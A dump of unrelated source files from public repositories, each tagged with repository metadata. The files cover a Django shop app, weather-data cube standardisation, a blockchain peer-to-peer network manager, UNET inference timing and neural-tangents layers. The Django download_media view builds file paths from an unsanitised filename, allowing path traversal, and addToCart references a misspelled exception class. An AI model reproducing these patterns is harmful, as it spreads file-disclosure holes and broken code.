situacao = "Reprovado"
res += '---------------------\n'
res += 'Disciplina: ' + disciplina.getNome() + '\n'
res += 'Código: ' + disciplina.getCodigo() + '\n'
res += 'Semestre: ' + str(disciplinaCursada.getSemestre()) + '\n'
res += 'Situação: ' + str(situacao) + '\n'
res += 'Ano: ' + str(disciplinaCursada.getAno()) + '\n'
res += '---------------------\n'
self.ctrlPrincipal.limite.mostraJanela('Aluno', res)
else:
self.ctrlPrincipal.limite.mostraJanela('Erro', 'Aluno não encontrado') | Luiss1569/Orietado-Objetos-I | Trabalhos/Trabalho 12/aluno.py | aluno.py | py | 11,632 | python | pt | code | 0 | github-code | 90 |
23089641573 | config = {
"exp_name": "uni_lstm",
"epochs": 20,
"encoder": "UniLSTM",
"batch_size": 128,
"hidden_dim": 2048,
"num_layers": 1,
"learning_rate": 1e-3,
"seed": 42,
"debug": False,
# "device": 'cpu',
"device": 'cuda',
"num_workers": 4,
"valid_freq": 1000,
"save_freq": 4000,
"test_checkpoint": 'best-model.pt'
} | AmanDaVinci/Universal-Sentence-Representations | configs/uni_lstm.py | uni_lstm.py | py | 368 | python | en | code | 0 | github-code | 90 |
30402659589 | from django.shortcuts import redirect,render
from django.contrib.auth import login,logout,authenticate
from shop.forms import *
from django.http import HttpResponse,HttpResponseRedirect
from shop.models.models import *
import os
# Create your views here.
fileDir = os.path.dirname(os.path.realpath(__file__))
# fileDir = os.path.dirname(fileDir)
split = fileDir.split('/')
media_dir = os.path.join(fileDir, 'images')
def home(request):
print(request.user.id)
products = Product.objects.all()
context = {
'products':products,
'request':request
}
print(request)
return render(request,'home.html',context)
def placeOrder(request,i):
customer= Customer.objects.get(id=i)
form=createorderform(instance=customer)
if(request.method=='POST'):
form=createorderform(request.POST,instance=customer)
if(form.is_valid()):
form.save()
return redirect('/')
context={'form':form}
return render(request,'placeOrder.html',context)
def addProduct(request):
form=createproductform()
if(request.method=='POST'):
form=createproductform(request.POST,request.FILES)
if(form.is_valid()):
form.save()
return HttpResponseRedirect('shop/home')
context={'form':form}
return render(request,'addProduct.html',context)
def registerPage(request):
if request.user.is_authenticated:
return redirect('home')
else:
form=createuserform()
customerform=createcustomerform()
if request.method=='POST':
form=createuserform(request.POST)
customerform=createcustomerform(request.POST)
if form.is_valid() and customerform.is_valid():
user=form.save()
customer=customerform.save(commit=False)
customer.user=user
customer.save()
return redirect('login')
context={
'form':form,
'customerform':customerform,
}
return render(request,'register.html',context)
def loginPage(request):
print('login')
if request.user.is_authenticated:
return HttpResponseRedirect('/shop/home')
else:
if request.method=="POST":
username=request.POST.get('username')
password=request.POST.get('password')
user=authenticate(request,username=username,password=password)
if user is not None:
login(request,user)
return HttpResponseRedirect('/shop/home')
context={}
return render(request,'login.html',context)
def logoutPage(request):
logout(request)
return HttpResponseRedirect('/shop/login')
def download_media(request, filename):
if request.method == 'GET':
print('dir_name',media_dir)
file_name_to_download = os.path.join(media_dir,filename)
print(file_name_to_download)
if os.path.exists(file_name_to_download):
with open(file_name_to_download, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="image/jpg")
response['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_name_to_download)
return response
else:
# log_obj.debug('download_media:file does not exists')
return HttpResponse("File does not exists", status=404)
def addToCart(request,pid,cid):
print(Customer.objects.all().values())
print(cid)
product = Product.objects.get(id=pid)
user = User.objects.get(id=cid)
form = quantityForm(request.POST)
if request.method=="POST":
if form.is_valid():
data=form.cleaned_data
quantity = data['quantity']
try:
print("create")
customer = Customer.objects.get(user=user)
Cart.objects.create(product=product, customer=customer, quantity=quantity)
return HttpResponse("Success")
except Costumer.DoesNotExist:
print("update")
customer = Customer.objects.create(name=user.username, user=user)
Cart.objects.create(product=product,customer=customer,quantity=quantity)
return HttpResponse("Success")
else:
print(form.errors)
return HttpResponse("failure")
else:
print("GET!!")
return HttpResponse("Failure")
def getCartItem(request,cid):
print(cid)
user = User.objects.get(id=cid)
costumer_id = Customer.objects.get(user=user)
cart_item = Cart.objects.filter(customer=costumer_id.id)
p_id=cart_item.values_list('product_id')
product=Product.objects.filter(id__in=p_id).values()
print(product)
return render(request,'Cart.html',{'cart_items':cart_item})
def checkout(request,cid):
user = User.objects.get(id=cid)
costumer_id = Customer.objects.get(user=user)
cart_item = Cart.objects.filter(customer=costumer_id.id)
print(cart_item)
ids=[]
for i in cart_item:
checkout = Checkout.objects.create(cart_item=i)
ids.append(checkout.id)
print(ids)
checkout = Checkout.objects.filter(id__in=ids)
return render(request,'checkout.html',{'checkout_items':checkout})
| Shashank-S-Rao/test | shop/views/views.py | views.py | py | 5,255 | python | en | code | 0 | github-code | 90 |
18579638839 | import sys
mina=10**10
def waru(a,b):
if a%b==0:
return a//b
else:
return (a//b)+1
N,H=map(int,input().split())
A=list()
B=list()
for i in range(N):
a,b=map(int,input().split())
A.append(a)
B.append(b)
ma=max(A)
ind=A.index(ma)
B=[i for i in B if i>ma]
B=sorted(B,reverse=True)
cou=1
s=0
for i in range(len(B)):
s+=B[i]
if H<=s:
print(i+1)
sys.exit()
H=H-s
print(len(B)+waru(H,ma)) | Aasthaengg/IBMdataset | Python_codes/p03472/s684454987.py | s684454987.py | py | 411 | python | en | code | 0 | github-code | 90 |
14064514191 | from typing import Any, Dict, List, Optional
import numpy as np
from iris.coords import CellMethod
from iris.cube import Cube, CubeList
from iris.exceptions import CoordinateNotFoundError
from numpy import dtype, ndarray
from improver import BasePlugin
from improver.metadata.amend import amend_attributes
from improver.metadata.check_datatypes import (
check_units,
get_required_dtype,
get_required_units,
)
from improver.metadata.constants.time_types import TIME_COORDS
from improver.utilities.round import round_close
class StandardiseMetadata(BasePlugin):
"""Plugin to standardise cube metadata"""
@staticmethod
def _rm_air_temperature_status_flag(cube: Cube) -> Cube:
"""
Remove air_temperature status_flag coord by applying as NaN to cube data.
See https://github.com/metoppv/improver/pull/1839 for further details.
"""
coord_name = "air_temperature status_flag"
try:
coord = cube.coord(coord_name)
except CoordinateNotFoundError:
coord = None
if coord:
if coord.attributes != {
"flag_meanings": "above_surface_pressure below_surface_pressure",
"flag_values": np.array([0, 1], dtype="int8"),
}:
raise ValueError(
f"'{coord_name}' coordinate is not of the expected form."
)
ncube = CubeList()
for cc in cube.slices_over("realization"):
coord = cc.coord(coord_name)
if np.ma.is_masked(coord.points):
raise ValueError(
f"'{coord_name}' coordinate has unexpected mask values."
)
mask = np.asarray(coord.points)
cc.data[mask.astype(bool)] = np.nan
cc.remove_coord(coord_name)
ncube.append(cc)
cube = ncube.merge_cube()
return cube
@staticmethod
def _collapse_scalar_dimensions(cube: Cube) -> Cube:
"""
Demote any scalar dimensions (excluding "realization") on the input
cube to auxiliary coordinates.
Args:
cube: The cube
Returns:
The collapsed cube
"""
coords_to_collapse = []
for coord in cube.coords(dim_coords=True):
if len(coord.points) == 1 and "realization" not in coord.name():
coords_to_collapse.append(coord)
for coord in coords_to_collapse:
cube = next(cube.slices_over(coord))
return cube
@staticmethod
def _remove_scalar_coords(cube: Cube, coords_to_remove: List[str]) -> None:
"""Removes named coordinates from the input cube."""
for coord in coords_to_remove:
try:
cube.remove_coord(coord)
except CoordinateNotFoundError:
continue
@staticmethod
def _standardise_dtypes_and_units(cube: Cube) -> None:
"""
Modify input cube in place to conform to mandatory dtype and unit
standards.
Args:
cube:
Cube to be updated in place
"""
def as_correct_dtype(obj: ndarray, required_dtype: dtype) -> ndarray:
"""
Returns an object updated if necessary to the required dtype
Args:
obj:
The object to be updated
required_dtype:
The dtype required
Returns:
The updated object
"""
if obj.dtype != required_dtype:
return obj.astype(required_dtype)
return obj
cube.data = as_correct_dtype(cube.data, get_required_dtype(cube))
for coord in cube.coords():
if coord.name() in TIME_COORDS and not check_units(coord):
coord.convert_units(get_required_units(coord))
req_dtype = get_required_dtype(coord)
# ensure points and bounds have the same dtype
if np.issubdtype(req_dtype, np.integer):
coord.points = round_close(coord.points)
coord.points = as_correct_dtype(coord.points, req_dtype)
if coord.has_bounds():
if np.issubdtype(req_dtype, np.integer):
coord.bounds = round_close(coord.bounds)
coord.bounds = as_correct_dtype(coord.bounds, req_dtype)
@staticmethod
def _discard_redundant_cell_methods(cube: Cube) -> None:
"""
Removes cell method "point": "time" from cube if present.
"""
if not cube.cell_methods:
return
removable_cms = [
CellMethod(method="point", coords="time"),
]
updated_cms = []
for cm in cube.cell_methods:
if cm in removable_cms:
continue
updated_cms.append(cm)
cube.cell_methods = updated_cms
def process(
self,
cube: Cube,
new_name: Optional[str] = None,
new_units: Optional[str] = None,
coords_to_remove: Optional[List[str]] = None,
attributes_dict: Optional[Dict[str, Any]] = None,
) -> Cube:
"""
Perform compulsory and user-configurable metadata adjustments. The
compulsory adjustments are:
- to collapse any scalar dimensions apart from realization (which is expected
always to be a dimension);
- to cast the cube data and coordinates into suitable datatypes;
- to convert time-related metadata into the required units
- to remove cell method ("point": "time").
Args:
cube:
Input cube to be standardised
new_name:
Optional rename for output cube
new_units:
Optional unit conversion for output cube
coords_to_remove:
Optional list of scalar coordinates to remove from output cube
attributes_dict:
Optional dictionary of required attribute updates. Keys are
attribute names, and values are the required value or "remove".
Returns:
The processed cube
"""
cube = self._rm_air_temperature_status_flag(cube)
cube = self._collapse_scalar_dimensions(cube)
if new_name:
cube.rename(new_name)
if new_units:
cube.convert_units(new_units)
if coords_to_remove:
self._remove_scalar_coords(cube, coords_to_remove)
if attributes_dict:
amend_attributes(cube, attributes_dict)
self._discard_redundant_cell_methods(cube)
# this must be done after unit conversion as if the input is an integer
# field, unit conversion outputs the new data as float64
self._standardise_dtypes_and_units(cube)
return cube
| metoppv/improver | improver/standardise.py | standardise.py | py | 6,926 | python | en | code | 95 | github-code | 90 |
28768621696 | import asyncio
import logging
import time
from secp256k1_zkp import PrivateKey, PublicKey
from .node import Node
from lnoise import Key
logger = logging.getLogger(__name__)
from .messages import message_id, inv_message_id
from uuid import uuid4
class NetworkManager:
def __init__(self, loop, syncer, config):
self.loop = loop
self.config = config
self.syncer = syncer
self.global_message_queue = syncer.queues['NetworkManager']
self.load_from_disc()
#for node in self.nodes.values():
# self.connect_to(node)
self.loop.call_soon(self.check_global_message_queue)
self.nodes={}
self.reconnect_list = {}
self.connecting = [] # nodes that are connecting, but not connected yet
self.server = asyncio.start_server(self.handle_connection, config['p2p']['host'], config['p2p']['port'], loop=loop)
self.tasks = []
self.up = True
asyncio.ensure_future(self.server, loop=loop)
asyncio.ensure_future(self.reconnect_loop(), loop=loop)
#set logging
default_log_level = logging.INFO;
if "logging" in config:#debug, info, warning, error, critical
loglevels = { "debug":logging.DEBUG, "info":logging.INFO, "warning":logging.WARNING, "error":logging.ERROR, "critical":logging.CRITICAL}
if "base" in config["logging"] and config["logging"]["base"] in loglevels:
logger.setLevel(loglevels[config["logging"]["base"]])
if "network" in config["logging"] and config["logging"]["network"] in loglevels:
#its ok to rewrite
logger.setLevel(loglevels[config["logging"]["network"]])
def load_from_disc(self):
lspriv=self.config['p2p']['lspriv']
s=Key(key=PrivateKey(lspriv.to_bytes(32,'big'), raw=True))
our_node_params = { 'network':
{
'host': self.config['p2p']['host'],
'port':self.config['p2p']['port'],
'advertised_host': self.config['p2p'].get('advertised_host', self.config['p2p']['host']),
'advertised_port': self.config['p2p'].get('advertised_port', self.config['p2p']['port']),
},
'static_full_key':s}
self.our_node = Node(None, our_node_params, self.loop, None)
logger.info("Our node public key %s"%s.pubkey())
self.nodes={}
def save_to_disc(self):
pass #TODO
async def connect_to(self, host_port_tuple, static_key=None):
if not host_port_tuple in self.nodes:
if not static_key:
raise Exception("Cannot connect to new node without static key")
host, port = host_port_tuple
new_node_params = { 'network': {'host':host, 'port':port}, 'static_key':static_key}
node = Node(self.our_node, new_node_params, self.loop, self.handle_message)
while host_port_tuple in self.connecting:
await asyncio.sleep(1)
if host_port_tuple in self.nodes:
return
self.connecting.append(host_port_tuple)
await node.connect()
self.connecting.remove(host_port_tuple)
async def handle_connection(self, reader, writer):
extra_info = writer.get_extra_info('peername')
host, port = extra_info[:2]
logger.info("New connection from %s %s"%(str(host), str(port)))
params = {'network':{'host':host, 'port':port}}
new_node = Node(self.our_node, params, self.loop, self.handle_message)
await new_node.accept_connection(reader, writer)
async def handle_message(self, node, _type, message):
if _type == "close": # TODO explanation that message can be thrown by Node-object itself in on_disconnect
if message[0] == 0:
if (node.host, node.port) in self.nodes:
self.nodes.pop((node.host, node.port))
#accidental disconnet, set to reconnect
node_params = (node.advertised_host, node.advertised_port)
if not node_params in self.reconnect_list:
if node.advertised_static_key: #we can't reconnect without static key
self.reconnect_list[node_params] = {'static_key':node.advertised_static_key, 'last_try_time':time.time(), 'try':0}
else:
self.reconnect_list[node_params]['last_try_time']=time.time()
self.reconnect_list[node_params]['try']+=1
if node_params in self.nodes:
self.nodes.pop(node_params)
if _type == "init":
node.deserialize_params(message, remote=True)
self.nodes[(node.host, node.port)]=node
if (node.advertised_host, node.advertised_port) in self.reconnect_list:
self.reconnect_list.pop((node.advertised_host, node.advertised_port))
#XXX possible attack here: if an attacker wants to exclude a node (segment)
# from the network. (s)he can DDoS this node and then reconnect it to all other
# nodes. If (s)he will advertise the attacked
# node host and port as its own, disconnected nodes will not try to
# reconnect. At the same time. if the attacker simulates multiple connections
# to the attacked node from previously connected nodes (again, advertising fake
# host and port), attacked node will not try to reconnect to disconnected
# nodes either. It is a difficult attack which requires enormous DDoS
# abilities, knowing of network topology, and absence of fresh coming nodes.
# Nevertheless, this issue should be revisited
if _type == "give nodes":
node_list_to_send = []
for k,v in self.nodes.items():
if not v==node:
node_list_to_send.append(v.serialize_params())
message = b"\x00\04"+len(node_list_to_send).to_bytes(2, "big") #TODO move byte operation unde node interface
for node_to_send in node_list_to_send:
message += len(node_to_send).to_bytes(2, "big") + node_to_send
await node.send(message)
if _type == "take nodes":
try:
node_list_len, r = message[:2], message[2:]
node_list_len = int.from_bytes(node_list_len, "big")
nodes=[]
local_in_connection=[]
try:
# Node appears in known_nodes only after `init` message
# So if the information about the node will reach us multiple times before
# the first successfull connection, we will try to connect to it multiple times
# self.in_connection is used to prohibit such behavior
self.in_connection
except:
self.in_connection = []
for i in range(node_list_len):
_node_len, r = r[:2], r[2:]
_node_len = int.from_bytes(_node_len, "big")
_node, r = r[:_node_len], r[_node_len:]
new_node = Node(self.our_node, None, self.loop, self.handle_message, serialized_params=_node)
#nodes.append(new_node.connect())
if not (new_node.host, new_node.port) in self.get_known_nodes():
if not (new_node.host, new_node.port) in self.in_connection:
if not (new_node.host, new_node.port) == (self.our_node.host, self.our_node.port):
if not new_node.static_key.serialize() == self.our_node.static_key.serialize(): # mirror replay
#await new_node.connect()
task = new_node.connect()
nodes.append(task)
self.in_connection.append((new_node.host, new_node.port))
local_in_connection.append((new_node.host, new_node.port))
if len(nodes):
await asyncio.wait(nodes)
for _node in local_in_connection:
self.in_connection.remove(_node)
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "give next headers":
try:
_ser_num, from_hash = message[:2], message[2:32+2]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': "give next headers",
'id':str(uuid4()), "num": num,
"from": bytes(from_hash), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take the headers":
try:
_ser_num, headers = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': 'take the headers',
'id':str(uuid4()), "num": num,
"headers": bytes(headers), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "give blocks":
try:
_ser_num, block_hashes = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': 'give blocks',
'id':str(uuid4()), "num": num,
"block_hashes": bytes(block_hashes), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take the blocks":
try:
_ser_num, blocks = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': 'take the blocks',
'id':str(uuid4()), "num": num,
"blocks": bytes(blocks), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "give the txos":
try:
_ser_num, txos_hashes = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
self.syncer.queues["Blockchain"].put({'action': 'give txos',
'id':str(uuid4()), "num": num,
"txos_hashes": bytes(txos_hashes), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take the txos":
try:
_ser_num, message = message[:2], message[2:]
num = int.from_bytes(_ser_num,"big")
txos_hashes, txos_lengths, txos = message[:num*65], message[num*65:num*65+num*2], message[num*65+num*2:]
self.syncer.queues["Blockchain"].put({'action': 'take the txos',
'id':str(uuid4()), "num": num,
"txos_hashes": bytes(txos_hashes), "txos_lengths": bytes(txos_lengths),
"txos": bytes(txos), "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take tip info":
try:
_ser_height, message = message[:4], message[4:]
tip, prev_hash, message = message[:32], message[32:64], message[64:]
_ser_td = message[:32]
height, total_difficulty = int.from_bytes(_ser_height, "big"), int.from_bytes(_ser_td, "big"),
self.syncer.queues["Blockchain"].put({'action': 'take tip info',
'id':str(uuid4()), "height": height, "prev_hash": bytes(prev_hash),
"tip":bytes(tip), "total_difficulty":total_difficulty, "node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "find common root":
try:
self.syncer.queues["Blockchain"].put({'action': 'find common root',
'id':str(uuid4()), "serialized_header": bytes(message),
"node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "find common root response":
try:
header_hash, serialized_len, message = message[:32], message[32:33], message[33:]
_len = int.from_bytes(serialized_len, "big") # SHouldn't we just use message[32] ?
known_headers = message[:_len]
self.syncer.queues["Blockchain"].put({'action': 'find common root response',
'id':str(uuid4()), "header_hash": bytes(header_hash),
'flags_num':_len, "known_headers": bytes(known_headers),
"node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "take TBM transaction":
try:
serialized_mode, serialized_skeleton = message[:2], message[2:]
self.syncer.queues["Blockchain"].put({'action': 'take TBM transaction',
'id':str(uuid4()), "tx_skel": bytes(serialized_skeleton),
"mode": int.from_bytes(serialized_mode, "big"),
"node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
if _type == "give TBM transaction":
try:
self.syncer.queues["Blockchain"].put({'action': 'give TBM transaction',
"node":(node.host, node.port), 'sender':"NetworkManager"})
except Exception as e:
print("exception nm", e)
pass #TODO DoS protection
def get_known_nodes(self):
nodes = [(node.advertised_host,node.advertised_port) for k,node in self.nodes.items()]
nodes = nodes+list(self.nodes)
return set(nodes)
def check_global_message_queue(self):
while not self.global_message_queue.empty():
message = self.global_message_queue.get()
action = message['action']
if action == "open connection":
host, port, static_key = message['host'], message['port'], PublicKey(message['static_key'], raw=True)
coro = self.connect_to( (host, port), static_key=static_key)
asyncio.ensure_future(coro, loop=self.loop)
if action == "get connections num":
_id = message['id']
request_source = message['sender']
self.syncer.queues[request_source].put({'id':_id, 'result':len(self.nodes)})
if action == "give intrinsic nodes list": #Not list anymore, considr renaming TODO
_id = message['id']
request_source = message['sender']
nodes_info = list(self.nodes.keys())
self.syncer.queues[request_source].put({'id':_id, 'result':nodes_info})
if action == "give nodes list": #Not list anymore, considr renaming TODO
_id = message['id']
request_source = message['sender']
nodes_info = {}
for node_params in self.nodes:
node = self.nodes[node_params]
nodes_info[(node.advertised_host, node.advertised_port)] = {'pubkey': node.static_key.serialize(),
'version': node.version}
self.syncer.queues[request_source].put({'id':_id, 'result':nodes_info})
if action == "give my node":
_id = message['id']
request_source = message['sender']
nodes_info = {(self.our_node.advertised_host, self.our_node.advertised_port): self.our_node.static_key.serialize()}
self.syncer.queues[request_source].put({'id':_id, 'result':nodes_info})
if action == "take the headers":
num, headers, node_params = message["num"], message["headers"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take the headers"]
message_to_send += num.to_bytes(2,"big")
message_to_send += headers
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "take the blocks":
num, blocks, node_params = message["num"], message["blocks"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take the blocks"]
message_to_send += num.to_bytes(2,"big")
message_to_send += blocks
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "take the txos":
num, txos, txos_hashes, txos_lengths, node_params = message["num"], message["txos"], message["txos_hashes"], message["txos_lengths"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take the txos"]
message_to_send += num.to_bytes(2,"big")
message_to_send += txos_hashes
message_to_send += txos_lengths
message_to_send += txos
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "give blocks":
num, blocks_hashes, node_params = message["num"], message["block_hashes"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["give blocks"]
message_to_send += num.to_bytes(2,"big")
message_to_send += blocks_hashes
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "give next headers":
num, from_hash, node_params = message["num"], message["from"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["give next headers"]
message_to_send += num.to_bytes(2,"big")
message_to_send += from_hash
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "give txos":
num, txos_hashes, node_params = message["num"], message["txos_hashes"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["give the txos"]
message_to_send += num.to_bytes(2,"big")
message_to_send += txos_hashes
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "take tip info":
logger.info("Take tip info")
height, tip, prev_hash, total_difficulty, node_params = message["height"], message["tip"], message["prev_hash"], message["total_difficulty"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take tip info"]
message_to_send += height.to_bytes(4,"big")
message_to_send += tip
message_to_send += prev_hash
message_to_send += total_difficulty.to_bytes(32,"big")
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "find common root":
serialized_header, node_params = message["serialized_header"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["find common root"]
message_to_send += serialized_header
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "find common root response":
header_hash, known_headers, _len, node_params = message["header_hash"], message["known_headers"], message['flags_num'], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["find common root response"]
message_to_send += header_hash
message_to_send += _len.to_bytes(1,"big")
message_to_send += known_headers
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "take TBM transaction":
mode, serialized_tx_skel, node_params = message["mode"], message["tx_skel"], message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["take TBM transaction"]
message_to_send += mode.to_bytes(2,"big")
message_to_send += serialized_tx_skel
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
if action == "give TBM transaction":
node_params = message["node"]
if not node_params in self.nodes:
continue
message_to_send = inv_message_id["give TBM transaction"]
coro = self.nodes[node_params].send(message_to_send)
asyncio.ensure_future(coro, loop=self.loop)
self.syncer.queues[message['sender']].put({'id':message['id'], 'result':'processed'})
'''if action == "send ping":
for node in self.nodes:
coro = node.send( "ping 0")
asyncio.ensure_future(coro, loop=self.loop)'''
if action == "stop":
logger.info("NetworkManager stops")
self.loop.stop()
return
if self.up:
self.loop.call_later(0.5, self.check_global_message_queue)
async def reconnect_loop(self):
def try_num_to_delay(try_num):
if try_num==0:
return 0
delay = 30*(2**try_num)
if delay > 1*3600:
delay = 1*3600
return delay
while self.up:
for node_params in self.reconnect_list:
ltt = self.reconnect_list[node_params]['last_try_time']
t = self.reconnect_list[node_params]['try']
if time.time()>ltt+try_num_to_delay(t):
asyncio.ensure_future(self.connect_to( node_params, static_key=self.reconnect_list[node_params]['static_key']))
await asyncio.sleep(5)
def NM_launcher(syncer, config):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
NM = NetworkManager(loop, syncer, config)
loop.run_forever()
| WTRMQDev/leer | leer/transport/network_manager.py | network_manager.py | py | 24,028 | python | en | code | 5 | github-code | 90 |
22617743020 | import time
import torch
from model import UNET
from utils import save_prediction_as_imgs
from dataset import CarvanaDataset
from torch.utils.data import DataLoader
import albumentations as A
from albumentations.pytorch import ToTensorV2
from PIL import Image
import numpy as np
import torchvision
import cv2
IMAGE_HEIGHT = 480
IMAGE_WIDTH = 720
BATCH_SIZE = 4
NUM_WORKERS = 2
PIN_MEMORY = True
test_transform = A.Compose(
[
A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),
A.Normalize(
mean = [0.0, 0.0, 0.0],
std = [1.0, 1.0, 1.0],
max_pixel_value = 255.0,
),
ToTensorV2(),
]
)
# Load model
model = UNET(in_channels=3, out_channels=1)
model_path = 'model/model_2.pth.tar'
checkpoint = torch.load(model_path)
model.load_state_dict(checkpoint['state_dict'])
# Inference function
def inference_image(image_path, model, image_transform, device='cuda'):
print("Device: ", device)
model = model.to(device)
img = np.array(Image.open(image_path).convert("RGB"))
img_normalized = image_transform(image=img)
img_normalized = img_normalized['image'].unsqueeze(0).to(device)
model.eval()
with torch.no_grad():
preds = torch.sigmoid(model(img_normalized))
preds = (preds>0.5).float()
torchvision.utils.save_image(
preds, "pred.png"
)
img_tensor = img_normalized*255
mask_tensor = preds*255
# Convert Image to OpenCV
cv_img = img_tensor[0].cpu().numpy().transpose(1, 2, 0)
cv_mask = mask_tensor[0].cpu().numpy().transpose(1, 2, 0)
# Masking
masked_car = np.copy(cv_img)
masked_car[(cv_mask>254).all(-1)] = [0,255,0]
masked_car_w = cv2.addWeighted(masked_car, 0.3, cv_img, 0.7, 0, masked_car)
cv2.imwrite('masked_car_w.jpg', masked_car_w)
# CPU Torch
image_path = 'data/test/0ee135a3cccc_04.jpg'
start_time = time.time()
inference_image(image_path, model, test_transform, device='cpu')
elapsed_time = time.time() - start_time
print("Torch Model CPU time: ", elapsed_time)
# GPU Torch
if torch.cuda.is_available():
start_time = time.time()
inference_image(image_path, model, test_transform, device='cuda')
elapsed_time = time.time() - start_time
print("Torch Model GPU time: ", elapsed_time)
# Scripting Model
scripted_model = torch.jit.script(model)
# CPU
start_time = time.time()
inference_image(image_path, scripted_model, test_transform, device='cpu')
elapsed_time = time.time() - start_time
print("Scripted Model CPU time: ", elapsed_time)
# GPU Torch
if torch.cuda.is_available():
start_time = time.time()
inference_image(image_path, scripted_model, test_transform, device='cuda')
elapsed_time = time.time() - start_time
print("Scripted Model GPU time: ", elapsed_time) | arief25ramadhan/carvana-unet-segmentation | torchscript_optimization.py | torchscript_optimization.py | py | 2,814 | python | en | code | 0 | github-code | 90 |
15984687296 | import functools
from typing import Callable, Iterable, Optional, Sequence
import warnings
from jax import numpy as jnp
import jax.example_libraries.stax as ostax
from .requirements import layer, supports_masking
from ..utils.kernel import Kernel
from ..utils.typing import InternalLayer, InternalLayerMasked, Kernels
@layer
def FanOut(num: int) -> InternalLayer:
"""Fan-out.
This layer takes an input and produces `num` copies that can be fed into
different branches of a neural network (for example with residual
connections).
Args:
num: The number of going edges to fan out into.
Returns:
`(init_fn, apply_fn, kernel_fn)`.
"""
init_fn, apply_fn = ostax.FanOut(num)
kernel_fn = lambda k, **kwargs: [k] * num
return init_fn, apply_fn, kernel_fn
@layer
@supports_masking(remask_kernel=False)
def FanInSum() -> InternalLayerMasked:
"""Fan-in sum.
This layer takes a number of inputs (e.g. produced by
:obj:`~neural_tangents.stax.FanOut`) and sums the inputs to produce a single
output. Based on :obj:`jax.example_libraries.stax.FanInSum`.
Returns:
`(init_fn, apply_fn, kernel_fn)`.
"""
init_fn, apply_fn = ostax.FanInSum
def kernel_fn(ks: Kernels, **kwargs) -> Kernel:
ks, is_reversed = _preprocess_kernels_for_fan_in(ks)
if not all([k.shape1 == ks[0].shape1 and
k.shape2 == ks[0].shape2 for k in ks[1:]]):
raise ValueError('All shapes should be equal in `FanInSum/FanInProd`, '
f'got `x1.shape`s of {[k.shape1 for k in ks]}, '
f'`x2.shape`s of {[k.shape2 for k in ks]}.')
is_gaussian = all(k.is_gaussian for k in ks)
if not is_gaussian and len(ks) != 1:
# TODO(xlc): FanInSum/FanInConcat could allow non-Gaussian inputs, but
# we need to propagate the mean of the random variables as well.
raise NotImplementedError('`FanInSum` is only implemented for the '
'case where all input layers guaranteed to be '
